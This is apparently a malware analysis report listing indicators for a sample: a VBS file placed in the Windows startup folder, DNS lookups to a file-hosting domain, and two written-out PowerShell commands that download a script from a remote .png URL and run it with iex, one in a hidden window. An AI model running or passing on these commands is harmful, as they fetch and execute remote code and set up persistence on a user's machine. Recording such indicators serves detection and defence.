Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ dddd.vbs
- 'b.###4top.io':443
- DNS ASK b.###4top.io
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://b.top4top.io/p_1635k452n1.png')' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://b.top4top.io/p_1635k452n1.png')